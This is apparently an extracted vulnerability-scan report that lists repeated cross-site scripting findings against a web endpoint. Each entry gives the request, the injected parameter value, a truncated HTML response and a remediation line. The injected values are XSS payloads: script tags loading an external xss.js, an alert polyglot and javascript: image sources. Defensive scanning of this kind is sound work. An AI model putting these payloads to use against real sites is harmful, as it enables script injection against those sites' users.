href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #215Scan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <SCRIPT a=\">\" SRC=\"http://soapui.org/xss.js\"></\nSCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #216\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <SCRIPT =\">\" SRC=\"http://soapui.org/xss.js\"></\nSCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #217\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <SCRIPT a=\">\" '' SRC=\"http://soapui.org/xss.js\"></\nSCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #218\nScan Cross Site Scripting\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <SCRIPT \"a='>'\" SRC=\"http://soapui.org/xss.js\"></\nSCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #219\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <SCRIPT a=`>` SRC=\"http://soapui.org/xss.js\"></\nSCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #220\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <SCRIPT a=\">'>\" SRC=\"http://soapui.org/xss.js\"></\nSCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #221\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@deepfence.io <SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"\nhttp://soapui.org/xss.js\"></SCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #222\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <PLAINTEXT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #223\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ';alert(String.fromCharCode(88,83,83))//\\';alert(\nString.fromCharCode(88,83,83))//\";alert(String.fromCharCode(\n88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\n\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #224\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# '';!--\"<XSS>=&{()}\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #225\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <SCRIPT SRC=http://soapui.org/xss.js></SCRIPT\n>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #226Scan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC=\"javascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #227\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC=javascript:alert('XSS')>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #228\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC=JaVaScRiPt:alert('XSS')>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 